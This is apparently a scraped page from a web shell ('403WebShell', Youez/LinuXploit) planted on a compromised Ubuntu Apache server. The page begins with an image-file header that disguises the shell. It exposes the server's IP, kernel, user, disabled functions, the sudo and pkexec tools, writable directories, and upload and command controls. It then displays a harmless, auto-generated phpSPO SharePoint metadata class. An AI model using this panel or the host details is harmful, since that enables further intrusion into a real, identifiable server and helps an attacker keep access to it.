????JFIF??x?x????'403WebShell
403Webshell
Server IP : 79.136.114.73  /  Your IP : 3.16.215.60
Web Server : Apache/2.4.7 (Ubuntu) PHP/5.5.9-1ubuntu4.29 OpenSSL/1.0.1f
System : Linux b8009 3.13.0-170-generic #220-Ubuntu SMP Thu May 9 12:40:49 UTC 2019 x86_64
User : www-data ( 33)
PHP Version : 5.5.9-1ubuntu4.29
Disable Function : pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,
MySQL : ON  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /usr/local/bin/vendor/vgrem/php-spo/src/SharePoint/Publishing/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /usr/local/bin/vendor/vgrem/php-spo/src/SharePoint/Publishing/SitePageMetadata.php
<?php

/**
 * This file was generated by phpSPO model generator 2020-08-19T18:22:34+00:00 16.0.20405.12008
 */
namespace Office365\SharePoint\Publishing;

use Office365\Runtime\ClientObject;
class SitePageMetadata extends ClientObject
{
    /**
     * @return string
     */
    public function getAbsoluteUrl()
    {
        if (!$this->isPropertyAvailable("AbsoluteUrl")) {
            return null;
        }
        return $this->getProperty("AbsoluteUrl");
    }
    /**
     * @var string
     */
    public function setAbsoluteUrl($value)
    {
        $this->setProperty("AbsoluteUrl", $value, true);
    }
    /**
     * @return array
     */
    public function getAuthorByline()
    {
        if (!$this->isPropertyAvailable("AuthorByline")) {
            return null;
        }
        return $this->getProperty("AuthorByline");
    }
    /**
     * @var array
     */
    public function setAuthorByline($value)
    {
        $this->setProperty("AuthorByline", $value, true);
    }
    /**
     * @return string
     */
    public function getBannerImageUrl()
    {
        if (!$this->isPropertyAvailable("BannerImageUrl")) {
            return null;
        }
        return $this->getProperty("BannerImageUrl");
    }
    /**
     * @var string
     */
    public function setBannerImageUrl($value)
    {
        $this->setProperty("BannerImageUrl", $value, true);
    }
    /**
     * @return string
     */
    public function getBannerThumbnailUrl()
    {
        if (!$this->isPropertyAvailable("BannerThumbnailUrl")) {
            return null;
        }
        return $this->getProperty("BannerThumbnailUrl");
    }
    /**
     * @var string
     */
    public function setBannerThumbnailUrl($value)
    {
        $this->setProperty("BannerThumbnailUrl", $value, true);
    }
    /**
     * @return integer
     */
    public function getCommentCount()
    {
        if (!$this->isPropertyAvailable("CommentCount")) {
            return null;
        }
        return $this->getProperty("CommentCount");
    }
    /**
     * @var integer
     */
    public function setCommentCount($value)
    {
        $this->setProperty("CommentCount", $value, true);
    }
    /**
     * @return bool
     */
    public function getCommentsDisabled()
    {
        if (!$this->isPropertyAvailable("CommentsDisabled")) {
            return null;
        }
        return $this->getProperty("CommentsDisabled");
    }
    /**
     * @var bool
     */
    public function setCommentsDisabled($value)
    {
        $this->setProperty("CommentsDisabled", $value, true);
    }
    /**
     * @return string
     */
    public function getContentTypeId()
    {
        if (!$this->isPropertyAvailable("ContentTypeId")) {
            return null;
        }
        return $this->getProperty("ContentTypeId");
    }
    /**
     * @var string
     */
    public function setContentTypeId($value)
    {
        $this->setProperty("ContentTypeId", $value, true);
    }
    /**
     * @return string
     */
    public function getDescription()
    {
        if (!$this->isPropertyAvailable("Description")) {
            return null;
        }
        return $this->getProperty("Description");
    }
    /**
     * @var string
     */
    public function setDescription($value)
    {
        $this->setProperty("Description", $value, true);
    }
    /**
     * @return bool
     */
    public function getDoesUserHaveEditPermission()
    {
        if (!$this->isPropertyAvailable("DoesUserHaveEditPermission")) {
            return null;
        }
        return $this->getProperty("DoesUserHaveEditPermission");
    }
    /**
     * @var bool
     */
    public function setDoesUserHaveEditPermission($value)
    {
        $this->setProperty("DoesUserHaveEditPermission", $value, true);
    }
    /**
     * @return string
     */
    public function getFileName()
    {
        if (!$this->isPropertyAvailable("FileName")) {
            return null;
        }
        return $this->getProperty("FileName");
    }
    /**
     * @var string
     */
    public function setFileName($value)
    {
        $this->setProperty("FileName", $value, true);
    }
    /**
     * @return string
     */
    public function getFirstPublished()
    {
        if (!$this->isPropertyAvailable("FirstPublished")) {
            return null;
        }
        return $this->getProperty("FirstPublished");
    }
    /**
     * @var string
     */
    public function setFirstPublished($value)
    {
        $this->setProperty("FirstPublished", $value, true);
    }
    /**
     * @return string
     */
    public function getFirstPublishedRelativeTime()
    {
        if (!$this->isPropertyAvailable("FirstPublishedRelativeTime")) {
            return null;
        }
        return $this->getProperty("FirstPublishedRelativeTime");
    }
    /**
     * @var string
     */
    public function setFirstPublishedRelativeTime($value)
    {
        $this->setProperty("FirstPublishedRelativeTime", $value, true);
    }
    /**
     * @return integer
     */
    public function getId()
    {
        if (!$this->isPropertyAvailable("Id")) {
            return null;
        }
        return $this->getProperty("Id");
    }
    /**
     * @var integer
     */
    public function setId($value)
    {
        $this->setProperty("Id", $value, true);
    }
    /**
     * @return bool
     */
    public function getIsPageCheckedOutToCurrentUser()
    {
        if (!$this->isPropertyAvailable("IsPageCheckedOutToCurrentUser")) {
            return null;
        }
        return $this->getProperty("IsPageCheckedOutToCurrentUser");
    }
    /**
     * @var bool
     */
    public function setIsPageCheckedOutToCurrentUser($value)
    {
        $this->setProperty("IsPageCheckedOutToCurrentUser", $value, true);
    }
    /**
     * @return bool
     */
    public function getIsWebWelcomePage()
    {
        if (!$this->isPropertyAvailable("IsWebWelcomePage")) {
            return null;
        }
        return $this->getProperty("IsWebWelcomePage");
    }
    /**
     * @var bool
     */
    public function setIsWebWelcomePage($value)
    {
        $this->setProperty("IsWebWelcomePage", $value, true);
    }
    /**
     * @return integer
     */
    public function getLikeCount()
    {
        if (!$this->isPropertyAvailable("LikeCount")) {
            return null;
        }
        return $this->getProperty("LikeCount");
    }
    /**
     * @var integer
     */
    public function setLikeCount($value)
    {
        $this->setProperty("LikeCount", $value, true);
    }
    /**
     * @return string
     */
    public function getListId()
    {
        if (!$this->isPropertyAvailable("ListId")) {
            return null;
        }
        return $this->getProperty("ListId");
    }
    /**
     * @var string
     */
    public function setListId($value)
    {
        $this->setProperty("ListId", $value, true);
    }
    /**
     * @return string
     */
    public function getModified()
    {
        if (!$this->isPropertyAvailable("Modified")) {
            return null;
        }
        return $this->getProperty("Modified");
    }
    /**
     * @var string
     */
    public function setModified($value)
    {
        $this->setProperty("Modified", $value, true);
    }
    /**
     * @return string
     */
    public function getModifiedRelativeTime()
    {
        if (!$this->isPropertyAvailable("ModifiedRelativeTime")) {
            return null;
        }
        return $this->getProperty("ModifiedRelativeTime");
    }
    /**
     * @var string
     */
    public function setModifiedRelativeTime($value)
    {
        $this->setProperty("ModifiedRelativeTime", $value, true);
    }
    /**
     * @return string
     */
    public function getPageLayoutType()
    {
        if (!$this->isPropertyAvailable("PageLayoutType")) {
            return null;
        }
        return $this->getProperty("PageLayoutType");
    }
    /**
     * @var string
     */
    public function setPageLayoutType($value)
    {
        $this->setProperty("PageLayoutType", $value, true);
    }
    /**
     * @return integer
     */
    public function getPromotedState()
    {
        if (!$this->isPropertyAvailable("PromotedState")) {
            return null;
        }
        return $this->getProperty("PromotedState");
    }
    /**
     * @var integer
     */
    public function setPromotedState($value)
    {
        $this->setProperty("PromotedState", $value, true);
    }
    /**
     * @return string
     */
    public function getPublishStartDate()
    {
        if (!$this->isPropertyAvailable("PublishStartDate")) {
            return null;
        }
        return $this->getProperty("PublishStartDate");
    }
    /**
     * @var string
     */
    public function setPublishStartDate($value)
    {
        $this->setProperty("PublishStartDate", $value, true);
    }
    /**
     * @return bool
     */
    public function getSocialBarOnSitePagesDisabled()
    {
        if (!$this->isPropertyAvailable("SocialBarOnSitePagesDisabled")) {
            return null;
        }
        return $this->getProperty("SocialBarOnSitePagesDisabled");
    }
    /**
     * @var bool
     */
    public function setSocialBarOnSitePagesDisabled($value)
    {
        $this->setProperty("SocialBarOnSitePagesDisabled", $value, true);
    }
    /**
     * @return string
     */
    public function getTitle()
    {
        if (!$this->isPropertyAvailable("Title")) {
            return null;
        }
        return $this->getProperty("Title");
    }
    /**
     * @var string
     */
    public function setTitle($value)
    {
        $this->setProperty("Title", $value, true);
    }
    /**
     * @return string
     */
    public function getTopicHeader()
    {
        if (!$this->isPropertyAvailable("TopicHeader")) {
            return null;
        }
        return $this->getProperty("TopicHeader");
    }
    /**
     * @var string
     */
    public function setTopicHeader($value)
    {
        $this->setProperty("TopicHeader", $value, true);
    }
    /**
     * @return string
     */
    public function getUniqueId()
    {
        if (!$this->isPropertyAvailable("UniqueId")) {
            return null;
        }
        return $this->getProperty("UniqueId");
    }
    /**
     * @var string
     */
    public function setUniqueId($value)
    {
        $this->setProperty("UniqueId", $value, true);
    }
    /**
     * @return string
     */
    public function getUrl()
    {
        if (!$this->isPropertyAvailable("Url")) {
            return null;
        }
        return $this->getProperty("Url");
    }
    /**
     * @var string
     */
    public function setUrl($value)
    {
        $this->setProperty("Url", $value, true);
    }
    /**
     * @return string
     */
    public function getVersion()
    {
        if (!$this->isPropertyAvailable("Version")) {
            return null;
        }
        return $this->getProperty("Version");
    }
    /**
     * @var string
     */
    public function setVersion($value)
    {
        $this->setProperty("Version", $value, true);
    }
    /**
     * @return SitePageVersionInfo
     */
    public function getVersionInfo()
    {
        if (!$this->isPropertyAvailable("VersionInfo")) {
            return null;
        }
        return $this->getProperty("VersionInfo");
    }
    /**
     * @var SitePageVersionInfo
     */
    public function setVersionInfo($value)
    {
        $this->setProperty("VersionInfo", $value, true);
    }
    /**
     * @return SPResourcePath
     */
    public function getPath()
    {
        if (!$this->isPropertyAvailable("Path")) {
            return null;
        }
        return $this->getProperty("Path");
    }
    /**
     * @var SPResourcePath
     */
    public function setPath($value)
    {
        $this->setProperty("Path", $value, true);
    }
}

Youez - 2016 - github.com/yon3zu
LinuXploit